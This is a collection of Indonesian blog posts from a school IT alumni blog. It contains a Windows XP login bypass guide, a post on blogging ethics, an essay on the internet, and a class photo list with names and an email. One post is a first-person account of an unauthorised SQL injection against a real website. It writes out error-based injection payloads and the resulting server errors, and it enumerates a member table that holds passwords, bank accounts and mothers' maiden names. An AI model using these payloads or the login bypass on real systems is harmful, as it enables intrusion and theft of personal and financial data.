Menjebol Password Login Windows XP


Semakin pesatnya dunia teknologi membuat orang-orang didunia ini tidak ingin mengalami ketertinggalan. Salah satunya ialah menguasai komputer, karena memang komputer telah menjadi sebuah kebutuhan untuk sekarang ini. Sehingga, karena terlalu pentingnya komputer pada saat sekarang ini membuat resiko kehilangan datapun semakin diperketat. Salah satunya dengan memberi password "kata kunci" untuk sistem komputer.

Pemberian "kata kunci" (selanjutnya disebut password) menjadi salah satu keamanan yang paling diandalkan untuk melindungi data-data atau informasi berharga selain dari enkripsi data. Untuk itu, banyak perusahaan-perusahaan pembuat software berlomba-lomba untuk dapat menciptakan sebuah software pelindung data seperti halnya "FolderGuard".

Namun, software-software saja dirasa masih belum cukup aman untuk melindungi data-data berharga. Selain melindungi data-data berharga, perlindungan terhadap komputer sendiri masih terus diusahakan, salah satunya ialah memberikan password login terhadap account tertentu.

Didalam tulisan ini akan dijelaskan bagaimana cara menjebol password login Windows XP dengan syarat account user biasa. Ada dua jenis bentuk login Windows XP, yaitu dengan kotak dialog dan dengan layar (screen) login.

Untuk layar (screen) login Windows XP, ikuti langkah berikut:

1. Pada saat komputer dihidupkan, muncul layar untuk login.

2. Tekan 3 tombol ajaib (Ctrl+Alt+Del) selama 2X

3. Kemudian muncul kotak dialog, pada field username ganti dengan "Administrator" (tanpa tanda kutip), password kosongkan saja.

4. Kemudian tekan Enter.

**Untuk model isian kotak dialog, langsung saja ketikkan "Administrator" dan Enter.


Untuk dipertegas kembali, teknik ini hanya untuk menjebol password login account user biasa. Jika sebelumnya sudah Administrator, cara ini tidak akan berhasil.

Artikel ini ditulis hanya untuk pengetahuan saja, bukan untuk disalahgunakan.

Blog yang menjamur

Menjamurnya blog-blog di dunia maya ini (blogspot.com, blog.com, dsb) membuat blogger-blogger diseluruh dunia mulai ingin menampilkan apa yang ada dalam benak dan pikiran mereka. Namun, masih banyak dari mereka benak dan pikirannya buntu alias kotor. Karena dengan mendapatkan web hosting gratis, mereka (sebagian dari mereka) menampilkan isi blog yang jorok, porno (karena memang isi diluar tanggung jawab penyedia)
Inilah salah satu sisi negatif dari dunia blogging. Namun kita selaku manusia yang ingin selalu menjadi yang terbaik, selalu memiliki pikiran yang jauh kedepan. Dengan isi blog yang demikian itu, apa bisa membuat kita bangga? Justru bagi saya itu adalah suatu kegagalan besar, aib yang besar. Bagi saya, blog mencerminkan kepribadian kita (orang yang membuat blog). Apakah mereka tidak malu memamerkan aib mereka sendiri ditempat umum?

Teknik SQL Injection

Ini adalah teknik SQL Injection yg saya pakai untuk meng-hack disalah satu situs. Teknik ini seperti telah digunakan oleh para hacker didunia seperti juga yang sudah pernah digunakan oleh "Dani Firmansyah (xnuxer)" yang sudah meng-hack situs KPU dan mengganti nama-nama partai didalamnya menjadi tidak karuan.


Jalannya SQL Injection yang saya pakai untuk pertama kalinya ini tadi (kamis, 5/12/2007) adl:

Target : www.dirahasiakan.com
Methode: SQL Injection
* tulis perintah ' having 1=1-- pada username untuk admin, password terserah
* tulis perintah id=2119&idm=40&idSM=2 dibelakang address bar .../login.asp?

** Pada saat dilakukan cara pertama, muncul error:
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'mlmf01.No_Anggota' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login.asp, line 37

** Back> Lalu ketikkan ' group by mlmf01.No_Anggota having 1=1-- Enter

** Ada Error lagi, sekarang didapat:
Tabel : mlmf01
Fields : No_Anggota, Nama_Anggota, dst

** Ketikkan kode lagi sampai berulang kali:
' group by mlmf01.No_Anggota, mlmf01.Nama_Anggota, ....., ..... having 1=1--

** Setelah semuanya selesai, didapat:
' group by mlmf01.No_Anggota, mlmf01.Nama_Anggota, mlmf01.PSW, mlmf01.Al1, mlmf01.Al2, mlmf01.Al3, mlmf01.Kota, mlmf01.Propinsi, mlmf01.KodePos, mlmf01.No_ID, mlmf01.No_Tlp, mlmf01.No_HP, mlmf01.Email, mlmf01.Rek_Bank, mlmf01.Kode_Bank, mlmf01.Cabang_Bank, mlmf01.Kota_Bank, mlmf01.Nama_Nasabah, mlmf01.JK, mlmf01.Tgl_Lahir, mlmf01.Pendidikan_Akhir, mlmf01.Pekerjaan, mlmf01.Agama, mlmf01.Ibu_Kandung, mlmf01.Usia_Ibu, mlmf01.Almarhumah, mlmf01.Status_Pasangan, mlmf01.Nama_Pasangan, mlmf01.Tgl_Lahir_Pasangan, mlmf01.Hub_Ahli_Waris, mlmf01.Nama_Ahli_Waris, mlmf01.Tgl_Lahir_Waris, mlmf01.Distributor, mlmf01.No_Sponsor, mlmf01.Tgl_Join, mlmf01.Kode_Distributor, mlmf01.Distributor_Pembayar_Bonus, mlmf01.Location_Id, mlmf01.Path_Tree, mlmf01.No_Parent, mlmf01.Serial_Number, mlmf01.RecTime, mlmf01.DG, mlmf01.Expired, mlmf01.Aktif, mlmf01.Tgl_Hibah, mlmf01.No_Anggota_Penghibah, mlmf01.Pernah_Expired, mlmf01.No_Sponsor_Extra, mlmf01.Level1, mlmf01.Web, mlmf01.Aktif_Rekrut, mlmf01.Aktif_Beli_Pulsa, mlmf01.Tgl_Capai_Bns, mlmf01.No_Anggota_Ex, mlmf01.No_Anggota_Jar, mlmf01.Rek_Bank_Paralel, mlmf01.Kode_Bank_Paralel, mlmf01.Customer_Id, mlmf01.Bns_hrg_5, mlmf01.Bns_hrg_6, mlmf01.Bns_hrg_7, mlmf01.Bns_hrg_8, mlmf01.Bns_hrg_9, mlmf01.Bns_hrg_10, mlmf01.LeaderShip, mlmf01.msrepl_tran_version having 1=1--

** Dan pesan error terakhir:
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator.
/login.asp, line 37

** Setelah itu, akan dilanjutkan dengan kode berikutnya... akses putus. Wah... masih newbie sih...

Internet

Internet,... banyak yang beranggapan pada mulanya dulu kalau internet itu adalah suatu media yang menghubungkan antara komputer dengan komputer atau antara komputer dengan mesin-mesin lainnya. Namun, anggapan itu kini sudah mulai dihilangkan karena saat ini yang terhubung ke internet bukan saja mesin, melainkan juga manusia.

Manusia-lah yang sebenarnya memegang peranan penting dalam perkembangan internet. Tanpa manusia, mesin hanyalah sebuah sampah biasa. Tanpa manusia, internet takkan bisa sebesar dan sehebat ini.

Suatu bukti bahwa internet itu bukan saja suatu media yang menghubungkan antara komputer dengan komputer atau dengan mesin-mesin itu ialah, saat ini sudah banyak sekali perangkat lunak (software) komputer yang mendukung manusia bisa berhubungan dengan jarak jauh, baik melalui suara, data atau bahkan visual (tatap muka secara langsung).

Perusahaan besar, Yahoo!, dengan perangkat lunaknya, kita bisa berkirim-kirim SMS (Short Message Service) hanya dengan melalui komputer. Seperti Skype juga misalnya, dengan perangkat lunak ini kita dapat berhubungan dengan sanak saudara atau dengan yang lainnya hanya dengan didepan komputer saja. Dengan ditambahkan perangkat kamera (webcam) dan speaker, kita sudah layaknya bertemu dengan rekan atau sanak saudara yang letaknya berjauhan. Tentu hal ini adalah suatu bukti kalau bukan hanya komputer yang terhubung, melainkan juga manusia.

Data, yang juga merupakan suatu hal yang berhubungan. Salah satu buktinya, YouTube dengan fasilitas share videonya, kita dapat saja meng-upload video data milik kita untuk nantinya dapat di-share dengan rekan kita. Dengan adanya alasan ini, jelas sudah bahwa bukan hanya mesin-mesin saja yang berhubungan, manusia dan data juga termasuk didalamnya.

Perusahaan-perusahaan pembuat hardware (perangkat keras komputer) mulai berlomba-lomba merancang sebuah temuan barunya, baik berupa temuan baru mereka maupun meningkatkan temuan mereka yang telah ada menjadi sempurna.

Tak bisa dipungkiri, meningkatnya software juga harus didukung oleh peningkatan hardware. Software (perangkat lunak) komputer Skype, tanpa diiringi dengan webcam maupun microphon, suatu hal yang sama saja nilainya dengan nol. Karena Skype digunakan untuk bertatap muka dan suara hanya dengan didepan komputer menggunakan perangkat keras webcam dan microphon. Jadi, jelaslah sudah bahwa meningkatnya software haruslah diiringi dengan hardware.

Diposting dari salah satu media cetak terbitan tahun 2007

Foto-foto keluarga besar IT SMK N 1 Pkl. Kerinci


(Blog ini dibuat untuk teman-teman alumni SMK N 1 Pangkalan Kerinci jurusan Teknik Informatika)

(maaf, foto-foto ini sengaja disamarkan)

Dari kiri atas ke kanan : Ayu Ningtyas, Chol Faizah, Eni Khaerani, Ervina Ekowati Wahyuningsih, Hanida Prasasti Mega Putri, Hendra Gunawan, Ira Dwi Murtiani, Junita, Khusnul Khotimah, Maisaroh, Mami Nurdiana, Ning Listiani, Nurhayati, Raden Kusuma, Randi Murdhani, Ratna Sulistia Ningsih, Ria Wijayanti, Riyanto, Robi Saputra, Rohimah, Silvia Yuliani, Yuliana Rianti, Zulhairi.

Bagi yang tergabung dalam keluarga besar IT SMK N 1 Pangkalan Kerinci yang ingin mendapatkan foto-foto diatas (foto terangnya), kirimkan email ke : gleriyanto@gmail.com (tuliskan pula alamat rumah dan nomor ponsel aktif untuk keterangan lebih lanjut).